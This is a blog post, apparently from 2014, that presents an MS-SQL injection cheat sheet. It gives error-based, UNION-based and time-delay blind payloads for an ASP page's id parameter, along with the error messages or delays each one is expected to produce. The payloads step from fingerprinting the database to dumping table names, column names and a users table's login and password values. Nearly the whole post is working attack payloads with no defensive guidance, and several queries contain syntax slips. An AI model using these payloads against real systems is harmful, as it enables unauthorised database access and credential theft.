jueves, 9 de enero de 2014

DETECCION BASICA DE INYECCION DE CODIGO EN MS-SQL


 MS-SQL INJECTION Basic DETECTION

DETECCION BASICA DE INYECCION DE CODIGO EN MS-SQL



     

Integer Injection:

http://[site]/page.asp?id=1 having 1=1--



Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.



String Injection:

http://[site]/page.asp?id=x' having 1=1--



Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.




ERROR SQL INJECTION - EXTRACT DATABASE USER

       

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--




Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT DATABASE NAME

       

http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))--



Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT DATABASE VERSION

       

http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--



Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT SERVER NAME

       

http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--



Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st  DATABASE TABLE

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--



Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-1'))--



Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>'TABLE-NAME-2'))--



Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--



Syntax error converting the nvarchar value '[COLUMN NAME  1]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--



Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--



Syntax error converting the nvarchar value '[COLUMN NAME  3]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--



Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--



Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--



Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--



Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND ROW]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--



Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD ROW]' to a column of data type int.



##########################

# MS-SQL UNION Injection #

##########################

UNION SQL INJECTION - DETECTION

     

Integer Injection:

http://[site]/page.asp?id=1 UNION SELECT ALL 1--



All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.



http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--



All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.



http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--



All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.



http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--



NO ERROR




UNION SQL INJECTION - EXTRACT DATABASE USER

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--



[DB USER]




UNION SQL INJECTION - EXTRACT DATABASE NAME

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--



[DB NAME]




UNION SQL INJECTION - EXTRACT DATABASE VERSION

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--



[DB VERSION]




UNION SQL INJECTION - EXTRACT SERVER NAME

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--



[SERVER NAME]




UNION SQL INJECTION - EXTRACT DATABASE TABLES

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--



[TABLE NAME 1]




UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--



[COLUMN NAME  1]




UNION SQL INJECTION - EXTRACT 1st FIELD

       

http://[site]/page.asp?id=1  UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--



[FIELD 1 VALUE]




UNION SQL INJECTION - EXTRACT 2nd FIELD

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--



[FIELD 2 VALUE]




UNION SQL INJECTION - EXTRACT 3nd FIELD

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--



[FIELD 3 VALUE]



##########################

# MS-SQL Blind Injection #

##########################

BLIND SQL INJECTION - DETECTION

     

Integer Injection:

http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)



String Injection:

http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)




BLIND SQL INJECTION - EXTRACT DATABASE USER

       

3 - Total Characters

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)



D  - 1st Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)


B - 2nd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)


O - 3rd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)



Database User = DBO




BLIND SQL INJECTION - EXTRACT DATABASE NAME

       

http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)



Database Name = PRO-DB-1




BLIND SQL INJECTION - EXTRACT 1st  DATABASE TABLE

     

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Table Name = USERS




BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),1,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),2,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),3,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),4,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),5,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),6,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Table Name = ORDERS




BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),1,1)))=99) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=116) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),6,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),7,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),8,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),9,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Table Name = CUSTOMERS




BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Column Name = USER




BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Column Name = PASS




BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Column Name = ID




BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

     

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = ADMIN




BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = 123




BLIND SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = 100




BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),2,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = POE




BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW

       

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('POE') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('POE') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('POE') order by USER desc),2,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('POE') order by USER desc),3,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)





No hay comentarios:

Publicar un comentario